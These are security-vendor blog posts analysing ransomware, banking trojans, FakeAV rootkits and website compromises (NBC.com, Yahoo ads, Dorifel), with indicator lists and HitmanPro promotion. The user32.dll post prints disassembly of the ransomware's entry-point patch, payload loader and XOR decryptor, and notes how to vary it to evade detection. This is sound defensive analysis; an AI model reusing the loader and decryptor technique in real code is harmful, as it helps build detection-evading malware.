Ransomware infecting user32.dll

June 13, 2014

Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware.

Till date there is nothing written about this new variant on the internet. This blog item aims to address this.

Analysis of this particular ransomware shows that the method to infect victims is different compared to previous ransomware samples. Instead of dropping an executable on the system it infects the Windows system DLL: user32.dll.

This file is typically located in:
C:\Windows\System32\user32.dll
      or
C:\Windows\SysWOW64\user32.dll

So far we’ve observed that the ransomware is only infecting the 32-bit version of user32.dll.

Static detection
Our support desk helped a victim in January 2014. Four months later, detection is still poor:

vt-user32

Resource section
The ransomware enlarges the resource section of user32.dll as can be seen in the table below:

Original user32.dll Infected user32.dll
name va vsize rawsize name va vsize rawsize
.text 0×1000 0x5f283 0x5f400 .text 0×1000 0x5f283 0x5f400
.data 0×61000 0×1180 0xc00 .data 0×61000 0×1180 0xc00
.rsrc 0×63000 0x2a088 0x2a200 .rsrc 0×63000 0x33a88 0x33c00
.reloc 0x8e000 0x2de4 0x2e00 .reloc 0x8e000 0x2de4 0x2e00

Analysis of the increased resource section in this file shows that it contains an encrypted payload with a decryptor embedded. We will show how the malware gets active once it has successfully infected the user32.dll file.

EntryPoint patched
The code in the entrypoint of an infected user32.dll is patched with a jump to AlignRects, as can be seen below:

Original:

UserClientDllInitialize:
7e41b217 8B FF          mov  edi, edi 
7e41b219 55             push ebp 
7e41b21a 8B EC          mov  ebp, esp 
7e41b21c 83 7D 0C 01    cmp  [ebp+0xC], 1 
7e41b220 75 05          jnz  0x7e41b227
 
7e41b222 E8 5D 07 00 00 call 0x7e41b984
 
7e41b227 5D             pop  ebp 
7e41b228 90             nop 
7e41b229 90             nop 
7e41b22a 90             nop 
7e41b22b 90             nop 
7e41b22c 90             nop 
7e41b22d 8B FF          mov  edi, edi 
7e41b22f 55             push ebp 
7e41b230 8B EC          mov  ebp, esp

Patched:

UserClientDllInitialize:
7e41b217 8B FF          mov  edi, edi 
7e41b219 55             push ebp 
7e41b21a 8B EC          mov  ebp, esp 
7e41b21c 83 7D 0C 01    cmp  [ebp+0xC], 1 
7e41b220 75 0E          jnz  0x7e41b230
 
7e41b222 E8 00 00 00 00 call 0x7e41b227
 
7e41b227 83 04 24 0A    add  [esp], 0xa 
7e41b22b E9 B0 22 05 00 jmp  AlignRects 
________________________________________
7e41b230 8B EC          mov  ebp, esp

The code at AlignRects is not the original, but is replaced with code that allocates a new block of executable memory. Hereafter it copies the encrypted payload from the resource section to this newly allocated memory.

AlignRects:
7e46d4e0  leave 
7e46d4e1  pusha 
7e46d4e2  push ebp
7e46d4e3  mov  ebp, esp
7e46d4e5  sub  esp, 8
7e46d4e8  mov  eax, [ebp+0x4C]        ; EAX becomes base-address of 
                                      ; user32.dll (7E410000)
7e46d4eb  mov  ecx, eax
7e46d4ed  add  eax, 0x13bc
7e46d4f2  mov  eax, [eax]             ; EAX becomes address of 
                                      ; NtQueryVirtualMemory

7e46d4f4  add  eax, 0xfffff5f0        ; EAX becomes address of 
                                      ; NtAllocateVirtualMemory
7e46d4f9  push 0x40
7e46d4fb  push 0x3000
7e46d500  lea  ecx, [ebp-0x4]
7e46d503  mov  [ecx], 0xc576
7e46d509  push ecx
7e46d50a  push 0
7e46d50c  lea  ecx, [ebp-0x8]
7e46d50f  mov  [ecx], 0
7e46d515  push ecx
7e46d516  push 0xff
7e46d518  call eax                    ; Call NtAllocateVirtualMemory
7e46d51a  mov  edi, [ebp-0x8]         ; EDI = allocated address
7e46d51d  mov  eax, edi
7e46d51f  mov  esi, [ebp+0x4C]        ; ESI = base-address of 
                                      ;       user32.dll (7E410000)
7e46d522  add esi, 0x8d200            ; ESI = address of encrypted payload 
                                      ;       in resource section
7e46d528  mov ecx, 0x98bb
7e46d52d  rep movs es:[edi], ds:[esi] ; Copy to allocated 
                                      ; (executable) range
7e46d52f  leave 
7e46d530  add  eax, 0x981e            ; EAX = address of decryption code
7e46d535  jmp  eax                    ; Start decryption !!

As can be seen from this code an executable block of memory is allocated. In order to do that, the address of NtAllocateVirtualMemory is calculated using the address of NtQueryVirtualMemory, which was obtained from the IAT of user32.dll.

The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below:

0:000> r
eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb
eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206

0:000> u eax l20
0029981e call 00299823
00299823 pop  edx                     EDX = current location !
00299824 sub  edx,7FFA2F22h
0029982a push esi
0029982b lea  esi,[edx+7FFA2F1Dh]     ESI = allocated mem-base (290000)
00299831 mov  ecx,981Eh               ECX = size to decrypt (num bytes)
00299836 sub  esi,ecx
00299838 push esi
00299839 mov  ebx,6FAAEh              The XOR key (BL only, so AEh)
0029983e xor  byte ptr [esi],bl       Decrypt byte-by-byte
00299840 inc  esi
00299841 inc  ebx                     Modify XOR key for each byte (+1)
00299842 loop 0029983e
00299844 pop  eax
00299845 pop  ecx
00299846 mov  dword ptr [eax+12h],ecx
00299849 jmp  eax                     Jump to allocated mem-base, 
                                      which is now decrypted.

The decryption of the payload uses a XOR based decryption scheme were the XOR value for each byte to decrypt is incremented after each operation.

Once all bytes in the allocated memory range are decrypted, the now plain code is executed. Note the first two instructions of this decryption code, where a call/pop combination is used to obtain the current address.

This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so automating the payload and decryptor to avoid static detection can be easily accomplished.

user32-decrypted2

user32-decrypted1

Once the ransomware becomes active, some typical ransomware behavior is performed:

  • Windows Safe Mode is disabled
  • Task Manager is blocked
  • Command Prompt is blocked
  • Registry Editor is blocked

… and of course the police themed picture is shown where a ransom fee is demanded in order to release the PC (see picture at the top of this article).

Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection.

Blocking CD-ROM drives
A new property of this particular ransomware is that it disables CD-ROM drives. This makes it for some computers harder to clean the system as is explained below.

When HitmanPro detects a system file that is infected, it searches for a white-listed variant on the computer. This as Windows tends to keep a copy of system files on multiple locations on the hard disk.
If HitmanPro cannot find a white-listed known safe version, it prompts for the Windows installation CD/DVD media that came with the computer. This is a very useful feature of HitmanPro and it has been in HitmanPro for years to return infected system files to pristine state!

But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files.

New Cloud Service
EDIT: HitmanPro build 219 (or newer) queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media.

32-bit: http://dl.surfright.nl/HitmanPro.exe
64-bit: http://dl.surfright.nl/HitmanPro_x64.exe

 

Samples:

3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1
3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C
7DD93123078B383EC179C4C381F9119F4EAC4EFB287FE8F538A82E7336DFA4CA

Background on hyped Bitcoin miner served via Yahoo

January 10, 2014

Last Friday security researchers from Fox-IT noticed that Yahoo was inadvertently spreading malware via its advertisement services. Last Monday the Israel-based security company Light Cyber spread a much hyped press release that most of the malware was used to mine Bitcoins. I am personally a bit surprised that the BBC, The Guardian and even Interpol tweeted about it, as Light Cyber provided little to no details or evidence.

interpol

The story is not completely wrong but, when you read those articles, the perception now is that the entire attack revolved around Bitcoin mining, which is false.

We saw the Bitcoin miner too but omitted it from our initial excerpt because, according to our own telemetry, only 4% of the victims that we rescued received this malware. And contrary to popular belief, click fraud and banking malware is a lot faster lucrative than mining Bitcoins with malware, as a miner likely requires specific hardware to be effective and that it will not survive long on a victim’s computer. In fact, this miner is easily picked up by antivirus software. And infected users will certainly notice the stressed out processor and/or GPU, which seriously hinders normal work or gaming.

Let me provide some useable evidence.

Citadel
We found that a Citadel trojan in this attack pulled in the Bitcoin miner about a minute after the PC got infected. Citadel is based on the Zeus banking malware, also known as Zbot. It typically creates a random folder under the %AppData% folder and has a random filename of typically 5 or 6 characters, e.g.:

C:\Users\<user>\AppData\Roaming\Iquha\ruyvy.exe

On each victim computer this malware is uniquely obfuscated to evade antivirus detection.

cgminer
The Bitcoin miner, however, is actually a wrapped version of an abused legitimate tool called cgminer, version 3.7.2 to be exact. Cgminer is a multi-threaded multi-pool FPGA and ASIC miner and relies on the OpenCL framework to perform the hashing computations for Bitcoin mining. OpenCL is mandatory for cgminer, which is by default not installed on Windows computers. This means that cgminer only works/affects machines with the OpenCL SDK installed or with special gaming-oriented hardware, as OpenCL.dll only comes standard with certain display drivers from AMD and NVIDIA.

In this attack, the cgminer malware was installed here:

C:\JvaApp\wdsdll.exe

When the victim computer is equipped with a modern GPU, this tool can produce hash rates orders of magnitude higher than what can be achieved with just a CPU. If the computer doesn’t have a capable GPU to speed up mining it returns “clDevicesNum returned error, no GPUs usable”.

cgminer

The miner uses libcurl for communication with a mining pool. Libcurl is also legitimate software.

Some SHA-256 hashes for the security community:

9621744EF9C063DAB33CCA0FD4CCB24D79D227AC29D28CD27797338ACD9ABD47
A99253A538C3EF1945E146050645E321DA3B055A2624F83356FCB3F8C37B0DB3
31DD1B7A65EEC28F0D2B03E070290494A945AD4643053D8396B5DC65DE595409
26CE58F04C7A002CDBE6F05BADF0E986825B25138802368D79C300B3E2E2E2F0

So the attackers do not have a 2.5-million-large Bitcoin mining network (or ‘bitnet’). This ‘bitnet’ is also not as effective as some think. A single infected computer with e.g. a decent NVIDIA GTX 560 Ti display card would take a week to generate EUR €0,1430 (at about 85.1 MHash/sec). We do not have hardware specifications of any or all victim computers, so let’s assume (hypothetically) that 1/4 of these infected machines would have this special NVIDIA display card. Also assuming that the miner would not have been noticed by antivirus software or the user, this ‘bitnet’ of 25,000 computers (1/4 of 4% of 2.5 million) would have generated about 5.5 BTC, or EUR €3,575 at the current exchange rate of the virtual currency.

The created perception that Bitcoin mining was the driving force behind the Yahoo attack is just plain wrong. The attack is about the people who earned a lot by offering their malware staging area at Yahoo to a multitude of criminals. Hence the enormous variety of malware. Surely, malware designed to steal your identity or banking credentials is far more threatening than malware which only takes a toll on your computers speed.


HitmanPro rescues anti-virus programs from malware attack

June 3, 2013

ZeroAccess Bag of Tricks
We’ve blogged a few times before about the tricks of the ZeroAccess malware family (aka ZAccess/Sirefef/Max++). For example, in July 2011 we blogged about ZeroAccess injecting a deadly payload into antivirus products and in June 2012 we blogged about ZeroAccess hiding its malicious code in an NTFS Extended Attribute.

Reparse Point
Recently a new ZeroAccess variant is spreading which employs a new trick to disable antivirus products. Specifically, the new variant places NTFS Reparse Points on the files of an antivirus causing access to the files to be redirected.

In the following screenshots (using the tool called Junction from Mark Russinovich, Sysinternals) you can see that ZeroAccess has placed a Reparse Point (type Symbolic Link) on the files of Microsoft Security Essentials. These reparse points redirect file access to a different location, disabling Microsoft Security Essentials:

Also using the ordinary dir-command you can see that redirection to [c:\windows\system32\config] is in place:

File Permissions
In addition to setting Reparse Points, ZeroAccess also strips the permissions from the files as can be seen in the following screenshot:

Permissions Stripped

To the rescue
On May 23rd we’ve released HitmanPro build 198 that removes the reparse points from Windows Defender and Microsoft Security Essentials. Also the permissions on the files are restored by HitmanPro.

Here a video showing the Redirection of the files belonging to Windows Defender and Microsoft Security Essentials:

The repair of Windows Defender and Microsoft Security Essentials by HitmanPro is free.

Download
Existing users of HitmanPro are automatically updated to the latest version while new users can download HitmanPro from here: get.hitmanpro.com.


HitmanPro removes child pornography

March 28, 2013

Today we have released HitmanPro version 3.7.3. One of the new features is the removal of child pornography that is dropped by the latest Urausy ransomware.

Urausy ransomware locks down the computer and displays images on screen to convince the user that child pornography was found. The images, displayed by the ransomware, are there to compel the victim to pay the 100 euro fine. In any case you should never pay the ransom.

Forensic Clustering
Having child pornography on the computer is illegal. Therefore HitmanPro version 3.7.3 not only removes the ransomware, but also the child pornography files. HitmanPro harnesses its forensic file clustering feature to relate images to the ransomware. This way the images get deleted along with the ransomware. An example:

Kickstart in action against Urausy

Kickstart Improvements
The easiest way to remove any kind of ransomware is using HitmanPro.Kickstart (link). HitmanPro version 3.7.3 offers an improved Kickstart Bootstrap loader that allows you to boot straight into your ransomed, but familiar Windows environment, bypassing any ransomware. There is no need to become familiar with the tools of other operating systems, like for instance Linux.

Besides killing ransomware, HitmanPro.Kickstart is also very useful for removing rogue antivirus malware. For example, Disk Antivirus Professional and AVASoft Antivirus Professional, both members of the Winwebsec malware family, prevent you to start any malware removal tools.

AVASoft Antivirus Professional

While HitmanPro already offers Force Breach to counter the attack on the HitmanPro process, you can now also use HitmanPro.Kickstart. Because new in version 3.7.3 is the addition of Kickstart hardening. This basically protects the HitmanPro application from being killed by external processes.

So if you boot your computer with HitmanPro.Kickstart, you can now easily kill rogue antiviruses as well.

Happy Easter!

HitmanPro 3.7.3 Changelog

  • ADDED: Removal of child pornography images dropped by Urausy ransomware.
  • ADDED: Detection of zero-day Urausy ransomware through forensic file clustering.
  • ADDED: Kickstart hardening to protect HitmanPro processes from Winwebsec malware family.
    Use Kickstart against Disk Antivirus Professional, AVASoft Antivirus Professional or other rogue antiviruses.
  • IMPROVED: Forensic file clustering speed.
  • IMPROVED: Reduced memory usage during forensic file clustering.
  • IMPROVED: Processing of registry key values.
  • FIXED: On some BIOSes, when booting with Kickstart, Windows loader would hang with either frozen screen or blinking cursor.
  • UPDATED: Kickstart Bootstrap loader 2.1.
  • UPDATED: Embedded white lists.

Download
http://www.surfright.nl/downloads


NBC.com hacked, serving up Citadel malware

February 21, 2013

A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.com infecting its visitors with malicious software (malware). We were investigating this as well and found the following interesting facts.

Update: Fox-IT has also posted a blog item on the incident.

There were two exploits links on the NBC website. The first one was on the main default (entry) page. And the second one was located on hxxp://www.nbc.com/assets/core/js/s_wrapper.js

s_wrapper_js

It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which is already sinkholed:

hxxp://184.82.177.125/tr2002/file.php
hxxp://184.82.177.125/tr2102/file.php

We’ve seen at least two different Citadel Trojans. MD5 hashes of the droppers:
c26c64c3129fca7aafe695904d5976da
16ee24be6b0afac36c994c9568e24331

An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages. We’ve seen them linking to e.g.:

hxxp://umaiskhan.com/ztuj.html
hxxp://moi-npovye-sploett.com/qqqq/1.php
hxxp://priceworldpublishing.com/aynk.html
hxxp://nikweinstein.com/cl/google.php
hxxp://walterjeffers.com/ctuk.html
hxxp://barbecuechickenrecipes.org/ctuk.htm
hxxp://toplineops.com/mtnk.html
hxxp://fabricaequiposestetica.com/ztuj.htm


RedKit Exploit Kit

The attacks were carried out by the Redkit Exploit Kit. One of RedKit’s noticeable features is that it can generate and rotate attack URLs every hour.

RedKit was also used last year during the Telegraaf attack in The Netherlands which served the Citadel Trojan from the Pobelka botnet (Dutch). The Pobelka botnet stole highly sensitive information (including usernames, passwords, certificates, documents and other data), 750GB in size, from over 150.000 computers located in networks from the Dutch government, hospitals, vital infrastructures like water and power plants, airlines, multinationals and other companies.


Just a coincidence
Did you know that the Citadel Trojan responsible for the Dorifel outbreak in The Netherlands last year had the NBC logo as file icon?dorifel-citadel


On-Demand Detection and Timeline
HitmanPro’s behavioral scan detects zero-day Citadel malware quite easily as can be seen in the below screenshot.

The new forensic cluster feature of HitmanPro establish a pretty timeline – post infection. So even if you got infected a few days ago, HitmanPro provides evidence on how that happened.

Citadel infection


ZeroAccess

Some of the victims have also been infected with the ZeroAccess malware after visiting NBC.com:
994da098a62905385af8481329bf7c70

nbc-zeroaccess

nbc-zeroaccess-hitmanpro

The ZeroAccess malware moderates an affected user’s Internet experience by modifying search results, and generates pay-per-click advertising revenue for its controllers, the cybercriminals. ZeroAccess is a dangerous threat that uses stealth techniques in order to hinder its detection and removal.


Unknown malware
The attack also served an unknown malware binary, connecting to various websites:

hxxp://envirsoft.com/d.htm
hxxp://eastsidetennisassociation.com/l.htm
hxxp://magasin-shop.com/r.htm
hxxp://beautiesofcanada.com/o.htm

Some antivirus vendors identify this malware as Zbot or a rootkit (MD5: 1fa5afe1ddcd083d40b5b330fd9b3613), but it is most definitely not Zbot and it’s not a rootkit either. The malware binary has a curious filename (3S4H3S.exe) and an interesting string at the end “SadokBdi”. If you Google Sadok or Kodas, you come across some interesting webpages.

SadokBdi


Facebook.com
While the attack is ongoing, Facebook.com is preventing posts to NBC.com, as can be seen from this screenshot:

Facebook


Perform Second Opinion Scan
If you’ve visited NBC.com today, you should perform a FREE second opinion scan to see if your computer got infected. You can download HitmanPro from here: get.hitmanpro.com


Late Night Show Jimmy Fallon

4 hours after the initial detection, the webpages of NBC.com still contained iframes opening exploit sites. In addition, we have seen other webpages like hxxp://www.latenightwithjimmyfallon.com and hxxp://www.jaylenosgarage.com serving some of the same links as NBC.com. This is also confirmed by the guys at Securi Blog.


Antivirus shortens the life-time of financial malware

October 23, 2012

This title breaths a certain amount of obviousness, but most financial malware or banking Trojans are actually designed by cyber-criminals to avoid detection and hide for antivirus programs. The main goal of these digital bank robbers is clearly to steal your money by manipulating online bank transactions.

Research by SurfRight shows that the average life-time of a banking Trojan on a computer is 81 days for computers that do not have an up-to-date antivirus program. And the average life-time of a banking Trojan on a fully protected computer, that has an up-to-date antivirus program, is 25 days.

New users
These statistics are based on scan results from new users that run HitmanPro for the first time. And since it is based on a user’s decision to find a second opinion and download HitmanPro, these numbers should not be taken as exact science. Nonetheless, it is a clear indication that using an up-to-date antivirus program dramatically reduces the life-time of a banking Trojan.

Long time
Many people will now ask “why didn’t the antivirus program catch the banking Trojan right away? 25 days is still a long time.”

That is a valid question. If the banking Trojan is stopped right away, HitmanPro will not detect one on that computer because it has never been there. Antivirus programs are the last line of defense and will stop the vast majority of malware attacks, but not 100%.

  • Does the police prevent all robberies? They should, but they don’t.
  • Does the coast guard stop all drug transports before entering the country? They should, but they don’t.
  • Is a doctor’s diagnosis correct every time? It should, but it isn’t.

In other words: Using an antivirus program on your computer will stop most malware attacks, and will reduce the life-time of malware that has slipped the defenses and silently installed itself on the computer.


BBC Click: How banking Trojans go undetected and steal your money

How did we measure?
2,465,497 users scanned their computer with HitmanPro between October 2011 and October 2012 (1 year). The above mentioned statistics are not based on a laboratory research but are derived from real-world computers. The HitmanPro agent reported back the date the banking Trojan was installed on the computer, including which antivirus program the user was using (including its status) before HitmanPro removed the banking Trojan. The specific banking Trojans we counted for this statistic were Zeus, Citadel, SpyEye and Tinba.

Dorifel
Last August, our HitmanPro agent discovered Citadel Trojans within the Dutch government during the Dorifel outbreak. We also discovered that these Trojans were active on fully protected computers for roughly three to four weeks, without being detected. This period – shocking for most people – was clearly not an incident but is in line with our research results.


Banking Trojan keeps hitting the Dutch hard

September 8, 2012

Two days ago, Thursday September 6th, the website of the popular Dutch newspaper Telegraaf.nl was treating its visitors on zero-day malware. Telegraaf.nl is ranked #10 on the list of most popular websites in The Netherlands. Even though the media kept using Telegraaf.nl as the origin of the attack, technically it was caused by a compromised website of a Dutch online marketing company that handles newsletters and email marketing activities for Telegraaf.nl. This online marketing company handles online activities for other well-known Dutch companies too, including some non-profit organizations.

More Dutch websites compromised
To not discredit this relatively small company, their name was deliberately kept under wraps and everybody used Telegraaf.nl when referring to the Thursday outbreak. But according to our research, it wasn’t just this small marketing company that was involved in this specific attack-vector that day. We’ve seen other Dutch compromised websites (that were running on vulnerable versions of the Joomla CMS) with an iframe pointing to the exact same attack site. This attack site was located in Denmark and was hosted on a .com domain registered to a Dutch citizen (this legitimate website was compromised by the attackers and turned into an attack site).

Since the site is hosted in Denmark, you can imagine that it takes a bit more time to take down an attack site hosted in a country other than The Netherlands – it requires international cooperation. Thanks to efforts of others, like the Dutch National Cyber Security Centre (NCSC), the attack page in Denmark was suspended on Friday afternoon.

RedKit Exploit Kit
The attack site was hosting a counter.php which was actually the RedKit exploit kit. One of RedKit’s noticeable features is that it can generate and rotate attack URLs every hour. These URLs point to other compromised websites which makes it difficult to reliably block RedKit’s URLs. The exploit kit uses HTTP response status code 302 to redirect the browser to immediately open the actual attack URL.

To defend itself against malware researchers RedKit is equipped with new anti-forensic features.

AV-Test
Another important feature of this exploit kit is that it allows the attackers to upload an executable (malware) and test it against 37 different antivirus solutions to optimize attacks and ensure results:


Image by SpiderLabs

CVE-2012-4681
To infect computers, this exploit kit abuses a recently discovered vulnerability in Java, registered under CVE-2012-4681. This vulnerability affects Java 7 Update 6 (or older) and Java 6 Update 34 (or older). Since this vulnerability was patched by Oracle just days ago, and knowing that the cybercriminals using RedKit optimized their malware to bypass AV protection, not many computers could withstand this attack.

Below an overview of the malware that HitmanPro encountered on systems that were infected by this attack (the detection ratio was determined using VirusTotal at time of the initial attack):

45% of the affected computers by this attack were infected with the Citadel malware. And the other malware are also designed to steal and generate money.

We were able to identify this initially unknown malware by correlating the timestamp of the infection with that of the initial downloader on the victim machines (the downloader installed the unknown malware within 3 minutes). SHA-256 hashes:

Downloader
8AEA345D4CF97163C60E73AFC7A5B83B4173B3BFD3BF20C37106F1ABFD75834F

Citadel
FA340A57E957F728960B2F5CE53A6FA3463DA45D0AC0B0661AFD1D6D6C346B7B

ZeroAccess
B589605757666883E3C98D1EB2714B5135D7F218D47591DB9EB01FB59BE714A0

Live Security Platinum
3B1FA7D912E968D091A336922932173E5977D9D67F2EA96AC77408CEE95331D5

Note: The Citadel malware is a descendant of the Zeus banking Trojan and re-encrypts itself each time it infects a victim, making each infection unique.

The Dutch government issued an initial warning about the fake antivirus. But after a few hours we could see that it was not the fake antivirus people should’ve been worried about: it’s the Citadel banking Trojan that affected most systems. Contrary to the fake antivirus, which is very visible and popping up on people’s screens, the Citadel banking Trojan is specifically designed to be invisible, for both users and antivirus programs.

HitmanPro detects these malware either through behavioral analysis and/or signature detection. It will also thoroughly remove these infections and repair the (for most AV difficult to fix) services.exe. More about that in our blog ZeroAccess – From Rootkit to Nasty Infection.

Image: HitmanPro detecting Live Security Platinum, ZeroAccess and Citadel malware

Citadel leading the Dutch Malware Prevalence Top 25
I’d also like to refer to July’s top 25 of prevalent malware where, in The Netherlands, the Citadel banking Trojan ranks #1. FakeAV and ZeroAccess rank #2 and #5 respectively. World-wide, the Zeus family (where Citadel is part of) ranks #6.

Thank You
I would like to thank the Dutch National Cyber Security Centre (NCSC) for providing us information during the initial research.


Win 8 Security System and its Rootkit

August 31, 2012

Rogue security software (aka FakeAV or Fake Antivirus) is a form of Internet fraud using malicious software (malware) that deceives or misleads users into paying money for fake or simulated removal of malware. Typically these programs do not have a virus definition database nor a virus scan engine. All of the processes of a security program are imitated to scare victims into believing that their computers are infected with critical risk malware and viruses.

Since 2008 FakeAV is one of the most common malware families that HitmanPro finds on computers protected by an up-to-date antivirus program. The reason for this is that security vendors have a hard time keeping up with the cybercriminals who obfuscate and release new versions and variants of their annoying creations almost every day. Each iteration also has a deceiving name like Security Shield and Live Security Platinum. And to further lure victims into paying money, most rogue security software protect themselves by preventing legitimate programs from starting – this includes productivity software, internet security software and rescue tools. So you can imagine why FakeAV still takes the #1 position on our Malware Prevalence Top 25 month after month.

Rootkit
The reason for writing this article is that we found a new FakeAV which takes a different approach of deceiving and frustrating its victims. This new FakeAV is called Win 8 Security System:

Unlike its predecessors this FakeAV comes with a special rootkit driver which monitors and manipulates the operating system, taking control of every other process and program on the computer. One of the main purposes of the rootkit is to repair the FakeAV program (make it stick to the machine) and to make removal complicated.

The recognition of the rootkit driver is currently very low, only 1 out of 42 renowned anti-virus programs are capable of identifying this rootkit:

The rootkit driver is installed in the Windows drivers folder and has a random name, e.g. C:\Windows\system32\drivers\51991c15f7a6834.sys

64-bit Driver
The malware installs a different driver on computers running 64-bit Windows and disables 64-bit kernel-mode driver signing on these machines. Nonetheless, the cybercriminals went an extra mile by self-signing it with a certificate. Note the validity period, which starts on August 30 (yesterday):

Fake Action Center
The malware shows a fake Action Center, telling the victim the computer is not properly protected against viruses and spyware. When you want to open the real Action Center from the Control Panel, the malware will open the fake one instead:

Browser Hijacker
FakeAV often configures the proxy settings of your computer to intercept web browsing. This malware is different and uses its rootkit to hijack Internet Explorer and Google Chrome to display fake security warning messages when you try to browse the Internet:


Shortcuts
Interestingly, shortcuts that belong to the malware (created on the Start Menu and on the Desktop) all link to the Windows command-line registry editior reg.exe. When the victim clicks on, for example, the Buy Win 8 Security System shortcut, a harmless registry entry is created, which is monitored by the rootkit.

  • Target: C:\WINDOWS\system32\reg.exe add “HKCU\SOFTWARE\Microsoft\Windows NT” /v FrameworkBuild /t REG_DWORD /d 0 /f

When this registry value is accessed (when you click on the shortcut), the rootkit is triggered and opens the shopping cart:

As you can see, for security software this FakeAV is pretty expensive. And if you pay, you have not only paid 100 bucks for fake software, you also submitted your credit card details to the cybercriminals.

Domains
When you look at the web traffic when the shopping cart opens, you can see some other interesting things:

The first site that is accessed is win8sec.com; the malware added this domain as a trusted domain to your computer upon installation. Next it communicates with the http://www.superantispyware.com domain, which belongs to a known legitimate anti-spyware program. If you compare the two websites you can see that win8sec.com is a partial copy of superantispyware.com:

When you lookup the win8sec.com domain record you can discover that it was registered not too long ago, on August 18, 2012 (the registrant details are fake):

The win8sec.com domain currently points to IP address 31.184.244.59. This address currently resides in the United Arab Emirates.

Solution
At time of this blog post, there is currently no anti-virus, anti-spyware or anti-malware tool that we know of that is capable of removing this malware completely. So some security forums are offering a comprehensive step-by-step tutorial, involving the use of multiple tools, to handle this infection. But many forget the rootkit component.

In the meantime, you can use HitmanPro (and the free license that comes with it) to thoroughly and conveniently remove the FakeAV program and its rootkit component. A screenshot of HitmanPro detecting this malware on a 64-bit computer:

Also, if you are affected by this malware, it is very likely that another malicious program was responsible for installing this FakeAV on your machine and is currently still hiding. You can also use HitmanPro to reveal and remove this hidden malware.


Joint Strike Force against Dorifel

August 11, 2012

The computer virus Dorifel became the past three days a very prominent news item as it was on a rampage, infecting as many computers as possible on both government and private networks. IT personnel were stressed out since there were next to no virus signatures to detect the malware.

The inconvenience felt by the general public grew fast as many town’s civil services, like the issuing of passports, had to be taken offline for damage control: Dorifel had encrypted most Excel and Word documents and converted them into executable files.

The result was that many government staff had to blow the dust of the old fashioned typewriters again as they were asked to leave their computers switched off in an attempt to stop the outbreak in its tracks.


Photo by Marcel van Hoorn (ANP)

The creativity of cybercriminals is endless and they do their utmost to stay hidden, bypass antivirus protection, slow down malware research and do something new. Knowing that most antivirus products will first focus on malware blocking only, we figured at the start of the outbreak that there will be no readily available solution soon to recover the millions of affected documents (which prolongs the exposure of sensitive data to the cybercriminals).

Teaming Up with Emsisoft
While we were investigating the outbreak, we also spoke with Fabian Wosar of Emsisoft who was immediately keen to help. He recently created tooling to combat the ACCDFISA and Reveton ransomware families and conveniently had a few boiler plate functions laying around to speed up development of a dedicated remediation tool.

We immediately setup an extra examination environment in our office in Hengelo for Fabian to remotely work on with us, gathered malicious objects and affected documents and started to analyze the malware’s code and behaviors. The task was to find out how the seized documents were encrypted, if there was a way to recover them and, if possible, create a special tool that people can use to recover their documents.

Working Around The Clock
After working from Wednesday evening into Thursday morning on August 9th, Fabian was ready to offer everybody a free to use decryption tool which is available from our special support page: http://www.surfright.com/support/dorifel-decrypter

From this spot we would again like to thank Fabian Wosar for working with us on such short notice and helping everybody, especially the Dutch people, in limiting the effects of this attack.

To continue, we would like to share some interesting details that we encountered using the images below.


Image: Word, Excel and application files are automatically altered and renamed by the Dorifel malware. Notice the ? which is in fact unicode character 202E (aka RTLO right-to-left-override character) which causes the infected file to show up in Windows as ‘Contractrcs.doc’ to fool users the file is still a document.


Image: The encrypted ‘documents’ contains movie phrases and references to TV shows.


Image: The +++scarface+++ marker indicating the start of the encrypted data, which represents the original document.


Image: The pseudo code of the encryption/decryption loop.


Image: The assembly code of the encryption/decryption loop.


Image: Dorifel communicating on the network. Notice it queries for a local machine named KASPERSKY. More important, notice the internet traffic with the pin= parameter, where Dorifel tries get additional payload. Since it first tries to connect to Microsoft’s Update Service (which is hardcoded in the malware) we think that the attackers were also planning to redirect Windows update traffic. The domain reslove-dns.com is currently sinkholed.


Image: Dorifel connecting to the forum.4game.com website for Command & Control information.


Image: Every 1500 seconds Dorifel is retrieving a seemingly harmless ‘Breaking Bad’ season 5 poster (jpeg).


Image: The ‘Breaking Bad’ jpeg image contains hidden encoded Command & Control data. Dorifel stores it in a .dat file in its own folder under &appdata%, e.g. C:\Documents and Settings\User\Application Data\S4428M\G9D8Z3.exe.dat


Image: Small extract from our database where our HitmanPro software was used to rescue AV protected computers that were infected by Dorifel. The table shows that many machines also had Zeus/Zbot/Citadel Trojans, for weeks! Note: user 4624107 had an expired license of our software, which is why the same malware was detected twice.


The Dorifel outbreak was only a symptom. But what is the real problem?

August 10, 2012

Earlier this week, government, public sector and networks of private companies were hit hard by a new wave of crypto malware named Trojan-Dropper.Win32.Dorifel. Computers were shut down and the old-fashioned type writers that were gathering dust in the basement reappeared in the work place. For a moment I even thought this was funny.

The Dorifel Trojan scans network shares, local drives and USB connected drives for executables and Microsoft Office (Word and Excel) documents. Documents and programs were replaced with a new executable file that has the .scr file extension. Currently, most affected users will not notice anything since the ‘documents’ open as usual. It looks like the malware is currently only interested in propagating itself to as many machines as possible. But it is not unlikely that the attackers will later start blocking the ‘documents’ and requesting a ransom fee for unblocking them.

This is bad news for the organizations that were hit. But what’s even worse is that the Trojan entered the networks through a variant of the Zeus/Zbot banking Trojan called Citadel. This means that this Trojan was already present on one or more computers inside the network for days, may-be weeks. In other words: the malware could already be snooping all electronic communication inside the organization, including stealing passwords of critical infrastructure, copying confidential documents, social security numbers, passport details, etc. without anyone (or anything) noticing (!)

